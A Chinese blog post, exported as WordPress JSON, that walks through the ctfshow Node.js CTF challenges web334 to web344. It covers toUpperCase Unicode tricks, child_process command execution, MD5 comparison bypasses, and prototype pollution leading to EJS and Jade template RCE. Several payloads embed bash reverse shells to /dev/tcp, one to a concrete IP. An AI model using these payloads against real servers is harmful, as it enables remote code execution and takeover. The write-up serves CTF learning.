{"id":427,"date":"2023-07-27T17:03:02","date_gmt":"2023-07-27T09:03:02","guid":{"rendered":"https:\/\/blog.byzhb.top\/?p=427"},"modified":"2023-09-02T17:08:03","modified_gmt":"2023-09-02T09:08:03","slug":"nodejs1","status":"publish","type":"post","link":"https:\/\/blog.byzhb.top\/index.php\/2023\/07\/27\/nodejs1\/","title":{"rendered":"Ctfshow nodejs"},"content":{"rendered":"

web334(\u7279\u6027)<\/h1>\n

login.js<\/p>\n

var express = require('express');\n\nvar router = express.Router();\n\nvar users = require('..\/modules\/user').items;\n\nvar findUser = function(name, password){\n\n return users.find(function(item){\n\n  return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;\n\n });\n\n};\n\n\/* GET home page. *\/\n\nrouter.post('\/', function(req, res, next) {\n\n res.type('html');\n\n var flag='flag_here';\n\n var sess = req.session;\n\n var user = findUser(req.body.username, req.body.password); \n\n if(user){\n\n  req.session.regenerate(function(err) {\n\n   if(err){\n\n\u200b    return res.json({ret_code: 2, ret_msg: '\u767b\u5f55\u5931\u8d25'});     \n\n   }\n\n\u200b    \n   req.session.loginUser = user.username;\n   res.json({ret_code: 0, ret_msg: '\u767b\u5f55\u6210\u529f',ret_flag:flag});        \n\n  });\n\n }else{\n\n  res.json({ret_code: 1, ret_msg: '\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef'});\n\n }  \n});\nmodule.exports = router;<\/code><\/pre>\n
user.js<\/p>\n
module.exports = {\n\n items: [\n\n  {username: 'CTFSHOW', password: '123456'}\n\n ]\n}<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230user.js\u6587\u4ef6\u4e2d\u8d26\u53f7\u5bc6\u7801\u90fd\u5df2\u7ecf\u7ed9\u51fa\uff0c\u6211\u4eec\u9700\u8981login\u6587\u4ef6\u4e2d\u7684\u5224\u65ad\u8bed\u53e5\u4e3atrue<\/p>\n
 return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;<\/code><\/pre>\n
\u6211\u4eec\u9700\u8981 name\u7684\u503c\u4e3a \u5927\u5199\u7684 'CTFSHOW'\uff0c\u53c8\u8981\u4e0d\u7b49\u4e8e'CTFSHOW'\uff0c\u6211\u4eec\u9700\u8981\u5229\u7528toUpperCase()\u65b9\u6cd5\u7684\u7279\u6027<\/p>\n
\n
\u5728Character.toUpperCase()\u51fd\u6570\u4e2d\uff0c\u5b57\u7b26\u0131\u4f1a\u8f6c\u53d8\u4e3aI\uff0c\u5b57\u7b26\u017f\u4f1a\u53d8\u4e3aS\u3002
\n\u5b57\u7b26\u0130\u4f1a\u8f6c\u53d8\u4e3ai\uff0c\u5b57\u7b26\u212a\u4f1a\u8f6c\u53d8\u4e3ak\u3002<\/p>\n<\/blockquote>\n
payload\uff1a<\/p>\n
username:'ctf\u017fhow'\n\npassword: '123456'<\/code><\/pre>\n
\"\"<\/div><\/p>\n
web335(\u7279\u6027)<\/h1>\n
execSync\u662fchild_process\u5e93\u91cc\u7528\u4e8e\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u4e00\u4e2a\u65b9\u6cd5\uff0c\u53c2\u6570\u76f4\u63a5\u662f\u547d\u4ee4<\/p>\n
require('child_process').execSync('cat f*').toString()<\/code><\/pre>\n
spawnSync\u662fchild_process\u5e93\u91cc\u53e6\u4e00\u4e2a\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u65b9\u6cd5\uff0c\u4e0e\u4e0a\u4e00\u4e2a\u65b9\u6cd5\u4e0d\u540c\u7684\u662f\uff0c\u8be5\u65b9\u6cd5\u547d\u4ee4\u548c\u53c2\u6570\u662f\u5206\u79bb\u7684<\/p>\n
require( 'child_process' ).spawnSync( 'cat', [ 'f*' ] ).stdout.toString()<\/code><\/pre>\n
web336(\u7279\u6027)<\/h1>\n
?eval=var a=require('chil'+'d_pro'+'cess');a['ex'+'ecSync']('cat f*')<\/code><\/pre>\n
\u8fd9\u91cc\u4f7f\u7528\u4e86\u58f0\u660e\u53d8\u91cf\u62fc\u63a5\u7ed5\u8fc7\uff0c\u7c7b\u4f3c\u4e8epython\u7684\u6a21\u677f\u6ce8\u5165\u548cRCE\u91cc\u7684\u62fc\u63a5\u7ed5\u8fc7<\/p>\n
web337(\u7279\u6027)<\/h1>\n
\u9898\u76ee\u6e90\u7801<\/p>\n
var express = require('express');\nvar router = express.Router();\nvar crypto = require('crypto');\n\nfunction md5(s) {\n  return crypto.createHash('md5')\n    .update(s)\n    .digest('hex');\n}\n\n\/* GET home page. *\/\nrouter.get('\/', function(req, res, next) {\n  res.type('html');\n  var flag = 'xxxxxxx';\n  var a = req.query.a;\n  var b = req.query.b;\n\n  if (a && b && a.length === b.length && a !== b && md5(a + flag) === md5(b + flag)) {\n    res.end(flag);\n  } else {\n    res.render('index', { msg: 'tql' });\n  }\n});\n\nmodule.exports = router;<\/code><\/pre>\n
\u8fd9\u91cc\u8981\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\u8bed\u53e5<\/p>\n
if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){\n  res.end(flag);\n}<\/code><\/pre>\n
\u9700\u8981\u4f20\u5165a\u4e0eb\u53c2\u6570\uff0c\u5e76\u4e14\u5b83\u4fe9\u7684\u957f\u5ea6\u8981\u76f8\u7b49\uff0c\u4f46\u53d8\u91cf\u81ea\u8eab\u4e0d\u76f8\u7b49\uff0c\u800c\u4e14\u5b83\u4fe9\u548cflag\u62fc\u63a5\u5230\u4e00\u8d77\u540e\u7ecfmd5\u52a0\u5bc6\u7684\u7ed3\u679c\u4e5f\u8981\u76f8\u7b49<\/p>\n
payload1<\/p>\n
?a[0]=1&b[0]=1<\/code><\/pre>\n
\u8fd9\u91cc\u662f\u4f20\u5165\u6570\u7ec4\uff0c\u6570\u7ec4\u4e2d\u90fd\u53ea\u6709\u4e00\u4e2a\u6210\u5458\u6545length\u76f8\u7b49\uff0c\u6211\u7406\u89e3\u7684\u662f\u7531\u4e8e\u4e0d\u662f\u540c\u4e00\u4e2a\u6570\u7ec4\u6240\u4ee5\u4e24\u6570\u7ec4\u4e5f\u4e0d\u7b49\uff0c\u7136\u540emd5\u52a0\u5bc6\u540e\u7684\u7ed3\u679c\u76f8\u7b49\u7684\u539f\u56e0\uff0c\u5e94\u8be5\u5c31\u662f\u6570\u7ec4\u91cc\u7684\u6210\u5458\u662f\u76f8\u540c\u7684\uff0c\u6545\u52a0\u5bc6\u7ed3\u679c\u76f8\u540c<\/p>\n
payload2<\/p>\n
?a[x]=1&b[x]=2<\/code><\/pre>\n
\u8fd9\u91cc\u5b58\u5165\u7684\u662f\u5bf9\u8c61\u5f62\u5f0f\uff0c\u5728JavaScript\u4e2d\u5bf9\u8c61\u53ef\u4ee5\u5f53\u505a\u952e\u503c\u5bf9\u7684\u5bb9\u5668\uff0c\u7c7b\u4f3c\u4e8epython\u91cc\u7684\u5b57\u5178\uff0c\u7136\u540e\u5bf9\u8c61\u5e76\u4e0d\u5177\u6709length\u5c5e\u6027\uff0c\u6545\u8fd4\u56de\u4e3a\u7a7a\uff0c\u4ece\u800c\u7a7a\u7a7a\u5f3a\u7b49\u4e8e\uff0c\u7136\u540e\u4e24\u4e2a\u5bf9\u8c61\u7684\u6210\u5458\u4e0d\u540c\uff0c\u6545\u4e0d\u7b49\u4e8e<\/p>\n
\u7136\u540e\u52a0\u5165\u4ee5\u62fc\u63a5\u7684\u5f62\u5f0f\u8f93\u51fa\u5bf9\u8c61\u672c\u8eab\u7684\u8bdd\uff0c\u53ea\u4f1a\u6253\u5370\u51fa[object Object]<\/strong>\u8fd9\u4e00\u5b57\u7b26\u4e32\uff0c\u5e76\u4e0d\u4f1a\u6253\u5370\u51fa\u6210\u5458\uff0c\u5982\u56fe\u6240\u793a
\n
\"\"<\/div>
\n\u6545\u8fd9\u4e24\u4e2a\u5bf9\u8c61\u62fc\u63a5flag\u53d8\u91cf\u540e\u7ecfmd5\u52a0\u5bc6\u76f8\u7b49<\/p>\n
web338(\u539f\u578b\u94fe\u6c61\u67d3)<\/h1>\n
\u770b\u9898\u76ee\u4ee3\u7801\u5173\u952e\u90e8\u5206<\/p>\n
router.post('\/', require('body-parser').json(),function(req, res, next) {\n  res.type('html');\n  var flag='flag_here';\n  var secert = {};\n  var sess = req.session;\n  let user = {};\n  utils.copy(user,req.body);\n  if(secert.ctfshow==='36dboy'){\n    res.end(flag);\n  }else{\n    return res.json({ret_code: 2, ret_msg: '\u767b\u5f55\u5931\u8d25'+JSON.stringify(user)});  \n  } \n});<\/code><\/pre>\n
\u770b\u4ee3\u7801\uff0c\u53ea\u8981\u8ba9secert.ctfshow==='36dboy'\u5c31\u80fd\u8f93\u51faflag\u3002\u6700\u4e3b\u8981\u7684\u6f0f\u6d1e\u4ee3\u7801\u8fd8\u662fcopy\u7684\u4e00\u4e2a\u9012\u5f52\u8c03\u7528\u51fd\u6570<\/p>\n
function copy(object1, object2){\n    for (let key in object2) {\n        if (key in object2 && key in object1) {\n            copy(object1[key], object2[key])\n        } else {\n            object1[key] = object2[key]\n        }\n    }\n  }<\/code><\/pre>\n
\u5b83\u4f1afor\u5faa\u73af\u904d\u5386object2\u4e2d\u7684\u952e\uff0c\u5982\u679c\u8fd9\u4e2a\u952e\u540d\u5728object1\u548cobject2\u4e2d\u90fd\u5b58\u5728\uff0c\u90a3\u4e48\u5c31\u8c03\u7528copy\u51fd\u6570\uff0c\u5426\u5219\u5c06object2\u7684key\u8d4b\u503c\u7ed9object1\u3002\u6211\u4eec\u53ef\u4ee5\u63a7\u5236object2\uff0c\u5982\u679cobject2\u4e2d\u7684key\u8bbe\u7f6e\u4e3aproto<\/em>\uff0c\u5c31\u53ef\u4ee5\u539f\u578b\u94fe\u6c61\u67d3\u4e86\u3002\u6211\u4eec\u5c06object2\u8d4b\u503c\u4e3a<\/p>\n
{"__proto__":{"ctfshow":"36dboy"}}<\/code><\/pre>\n
\n
\u6211\u4eec\u60f3\u8ba9proto<\/strong>\u4e3a\u952e\u540d\u5c31\u5fc5\u987b\u8981json\u8bed\u6cd5\u683c\u5f0f\uff0c\u4e0d\u7136\u7684\u8bdd\uff0cproto<\/strong>\u5c31\u4f1a\u8bc6\u522b\u4e3a\u539f\u578b\u800c\u4e0d\u662f\u952e\u540d\uff0c\u6240\u4ee5\u5728key\u904d\u5386\u65f6\u4e5f\u53ea\u6709ctfshow\u8fd9\u4e2a\u952e\u540d\u4e86\u3002<\/p>\n<\/blockquote>\n
web339(\u539f\u578b\u94fe\u6c61\u67d3)<\/h1>\n
\u4e00\u4e2ademo<\/p>\n
function copy(object1, object2){\n   for (let key in object2) {\n       if (key in object2 && key in object1) {\n           copy(object1[key], object2[key])\n       } else {\n           object1[key] = object2[key]\n       }\n   }\n }\nvar user ={}\nbody=JSON.parse('{"__proto__":{"query":"return 123"}}');\ncopy(user,body);\nconsole.log(query);<\/code><\/pre>\n
\u8fd0\u884c\u4e0a\u9762\u7684\u65b9\u6cd5\u4f1a\u53d1\u73b0query\u6709\u4e86\u65b0\u7684\u503c<\/p>\n
\u5f53\u53d8\u91cf\u6ca1\u6709\u88ab\u58f0\u660e\u6216\u5f15\u7528\u8d4b\u503c\u65f6\uff0c\u4fbf\u4f1a\u53bb\u4e0a\u4e00\u7ea7Object\u5bf9\u8c61\u4e2d\u67e5\u627e\u8be5\u53d8\u91cf\u7684\u503c<\/p>\n
payload<\/p>\n
{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \\"bash -i >& \/dev\/tcp\/xxx\/4567 0>&1\\"')"}}\n}}<\/code><\/pre>\n
web340(\u539f\u578b\u94fe\u6c61\u67d3)<\/h1>\n
\u9898\u76ee\u5173\u952e\u90e8\u5206\u6e90\u7801<\/p>\n
\/\/app.js\nrouter.post('\/', require('body-parser').json(),function(req, res, next) {\n res.type('html');\n res.render('api', { query: Function(query)(query)});\n});<\/code><\/pre>\n
 \/\/login.js\nvar user = new function(){\n  this.userinfo = new function(){\n  this.isVIP = false;\n  this.isAdmin = false;\n  this.isAuthor = false;   \n  };\n }\n utils.copy(user.userinfo,req.body);\n\n\/\/\u8fd9\u6b21\u7684\u76ee\u6807\u6570\u7ec4\u9700\u8981\u5f80\u4e0a\u4e24\u5c42\u624d\u53ef\u4ee5\u6c61\u67d3\u5230object<\/code><\/pre>\n
\u548c\u4e0a\u4e00\u9898\u76f8\u540c\u90fd\u9700\u8981\u5229\u7528\u5b9a\u4e49\u51fd\u6570\u7684\u6784\u9020\u51fd\u6570Function\u6765\u53cd\u5f39shell\uff0cpayload<\/p>\n
{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \\"bash -i >& \/dev\/tcp\/xxx\/4567 0>&1\\"')"}}}<\/code><\/pre>\n
web 341(ejs)<\/h1>\n
\u8fd9\u9053\u9898\u6ca1\u4e86\u4e0a\u9762\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u7684\u8bed\u53e5\uff0c\u8981\u7528\u5230 ejs \u6a21\u677f\u5f15\u64ce\u7684RCE\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u4e5f\u662f\u4e0a\u9762\u51e0\u4e2a\u9898\u7684\u901a\u89e3(\u6f0f\u6d1e\u8be6\u7ec6<\/a>)<\/p>\n
\u91cd\u70b9\u5728ejs\u5e93\u4e2d\u6846\u8d77\u6765\u7684\u8fd9\u51e0\u884c
\n
\"\"<\/div>
\n\u53ef\u4ee5\u770b\u5230\uff0c opts<\/code> \u5bf9\u8c61 outputFunctionName<\/code> \u6210\u5458\u5728 express \u914d\u7f6e\u7684\u65f6\u5019\u5e76\u6ca1\u6709\u7ed9\u4ed6\u8d4b\u503c\uff0c\u9ed8\u8ba4\u4e5f\u662f\u672a\u5b9a\u4e49\uff0c\u5373 undefined<\/code>\uff0c\u8fd9\u6837\u5728 574 \u884c\u65f6\uff0cif \u5224\u5426\uff0c\u8df3\u8fc7<\/p>\n
\u4f46\u662f\u5728\u6211\u4eec\u6709\u539f\u578b\u94fe\u6c61\u67d3\u7684\u524d\u63d0\u4e4b\u4e0b\uff0c\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u57fa\u7c7b\u7684\u6210\u5458\u3002\u8fd9\u6837\u6211\u4eec\u7ed9 Object<\/code> \u7c7b\u521b\u5efa\u4e00\u4e2a\u6210\u5458 outputFunctionName<\/code>\uff0c\u8fd9\u6837\u53ef\u4ee5\u8fdb\u5165 if \u8bed\u53e5\uff0c\u5e76\u5c06\u6211\u4eec\u63a7\u5236\u7684\u6210\u5458 outputFunctionName<\/code> \u8d4b\u503c\u4e3a\u4e00\u4e32\u6076\u610f\u4ee3\u7801\uff0c\u4ece\u800c\u9020\u6210\u4ee3\u7801\u6ce8\u5165\u3002\u5728\u540e\u9762\u6a21\u7248\u6e32\u67d3\u7684\u65f6\u5019\uff0c\u6ce8\u5165\u7684\u4ee3\u7801\u88ab\u6267\u884c\uff0c\u4e5f\u5c31\u662f\u8fd9\u91cc\u5b58\u5728\u4e00\u4e2a\u4ee3\u7801\u6ce8\u5165\u7684 RCE<\/p>\n
\u5728\u8be5\u9898\u76ee\u4e2d\u9700\u8981\u5411\u4e0a\u4e24\u5c42\u624d\u80fd\u6c61\u67d3\u5230object<\/p>\n
payload<\/p>\n
{"__proto__":{"__proto__":{"outputFunctionName":"_llama1;global.process.mainModule.require('child_process').exec('bash -c \\"bash -i >& \/dev\/tcp\/121.43.154.98\/9001 0>&1\\"');var _llama2"}}}<\/code><\/pre>\n
web342(jade)<\/h1>\n
\u8be5\u9898\u662fjade\u6a21\u677f\u5f15\u64ce\u7684RCE\u6f0f\u6d1e(\u6f0f\u6d1e\u8be6\u7ec6<\/a>)<\/p>\n
payload<\/p>\n
{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \\"bash -i >& \/dev\/tcp\/your-ip\/port 0>&1\\"')"}}}\n\n\/\/\u540c\u6837\u662f\u5411\u4e0a\u6c61\u67d3\u4e24\u7ea7<\/code><\/pre>\n
\"\"<\/div>
\nPOST\u53d1\u5305\u8bbf\u95eelogin\u8def\u7531(\u6ce8\u610f\u6dfb\u52a0\u7ea2\u8272\u6846\u5185\u8bf7\u6c42\u5934)\uff0c\u7136\u540e\u518d\u6b21\u968f\u4fbf\u53d1\u4e00\u4e0b\u5305\u5373\u53ef\u53cd\u5f39shell<\/p>\n
web343(jade)<\/h1>\n
payload<\/p>\n
{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \\"bash -i >& \/dev\/tcp\/your-ip\/port 0>&1\\"')"}}}\n\n\/\/\u540c\u6837\u662f\u5411\u4e0a\u6c61\u67d3\u4e24\u7ea7<\/code><\/pre>\n
\u64cd\u4f5c\u548c\u77e5\u8bc6\u70b9\u548c\u4e0a\u4e00\u9898\u76f8\u540c<\/p>\n
web344(\u7279\u6027)<\/h1>\n
\u9898\u76ee\u6e90\u7801<\/p>\n
router.get('\/', function(req, res, next) {\n    res.type('html');\n    var flag = 'flag_here';\n\n    if (req.url.match(\/8c|2c|\\,\/ig)) {\n        res.end('where is flag :)');\n    }\n\n    var query = JSON.parse(req.query.query);\n\n    if (query.name === 'admin' && query.password === 'ctfshow' && query.isVIP === true) {\n        res.end(flag);\n    }\n    else {\n        res.end('where is flag. :)');\n    }\n});<\/code><\/pre>\n
\u7ecf\u5206\u6790\u6ee1\u8db3\u8be5if\u8bed\u53e5\u5373\u53ef\u5f97\u5230flag<\/p>\n
query.name === 'admin' && query.password === 'ctfshow' && query.isVIP === true<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u51fa\u6211\u4eec\u4f20\u4e00\u4e2a\u7b26\u5408\u6761\u4ef6\u7684JSON\u6570\u636e\u5373\u53ef\uff0c\u4f46\u662f\u8be5\u6b63\u5219\u5c06\u9017\u53f7\u53ca\u5176\u76f8\u5e94\u7684URL\u7f16\u7801\u90fd\u7ed9\u7981\u4e86<\/p>\n
if (req.url.match(\/8c|2c|\\,\/ig)) {\n    res.end('where is flag :)');\n}<\/code><\/pre>\n
\u8fd9\u662f\u6211\u4eec\u8981\u5904\u7406\u7684payload\uff0c\u8981\u8ba9\u5176\u6ca1\u6709\u9017\u53f7<\/p>\n
?query={"name":"admin","password":"ctfshow","isVIP":true}<\/code><\/pre>\n
\u8fd9\u91cc\u8981\u8bf4\u4e00\u4e2a\u7279\u6027\uff0cJSON.parse()\u51fd\u6570\u5728\u5904\u7406\u6570\u7ec4\u65f6\u4f1a\u628a\u6570\u7ec4\u91cc\u7684\u6210\u5458\u90fd\u7528\u9017\u53f7\u62fc\u63a5\u6210\u4e00\u6574\u4e2a\u5b57\u7b26\u4e32\uff0c\u7136\u540e\u8fdb\u884c\u89e3\u6790<\/p>\n
\u4f8b\u5982<\/p>\n
var a = ['{"name":"admin"','"password":"ctfshow"}'];\nvar query = JSON.parse(a);\nconsole.log(query);\n\n\/\/\u62fc\u63a5\u4e3a['{"name":"admin","password":"ctfshow"}']<\/code><\/pre>\n
\u8f93\u51fa<\/p>\n
{ name: 'admin', password: 'ctfshow' }<\/code><\/pre>\n
\u6240\u4ee5\u6211\u4eec\u7684payload\u8981\u5206\u5f00\u4f20\u53c2\uff0c\u6784\u6210\u6570\u7ec4\uff0c\u4ee5\u6b64\u6765\u7ed5\u8fc7\u9017\u53f7\uff0cpayload\u4e3a<\/p>\n
?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}\n\n\/\/\u8fd9\u91ccctfshow\u5199\u4e3a%63tfshow\u7684\u76ee\u7684\u662f\u524d\u9762\u7684\u53cc\u5f15\u53f7\u7ecf\u8fc7URL\u7f16\u7801\u540e\u4e3a %22 \u7136\u540e\u548c\u5b57\u6bcdc\u7ec4\u6210 2c \u88ab\u6b63\u5219\u8fc7\u6ee4\uff0c\u6240\u4ee5\u8981\u5bf9\u5b57\u6bcdf\u8fdb\u884cURL\u7f16\u7801<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Node.js\u662f\u4e00\u4e2a\u57fa\u4e8eChrome V8\u5f15\u64ce\u7684JavaScript\u8fd0\u884c\u65f6\u73af\u5883\u3002\u5b83\u5141\u8bb8\u4f7f\u7528JavaScript\u6765\u7f16\u5199\u670d\u52a1\u5668\u7aef\u4ee3\u7801\uff0c\u4f7f\u5f97JavaScript\u65e2\u53ef\u4ee5\u5728\u6d4f\u89c8\u5668\u4e2d\u8fd0\u884c\uff0c\u4e5f\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u7aef\u8fdb\u884c\u5f00\u53d1<\/p>\n","protected":false},"author":1,"featured_media":434,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,37,22],"tags":[15,38,26],"class_list":["post-427","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-nodejs","category-webs","tag-ctf","tag-nodejs","tag-web"],"_links":{"self":[{"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/posts\/427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/comments?post=427"}],"version-history":[{"count":1,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions"}],"predecessor-version":[{"id":435,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions\/435"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/media\/434"}],"wp:attachment":[{"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/media?parent=427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/categories?post=427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.byzhb.top\/index.php\/wp-json\/wp\/v2\/tags?post=427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}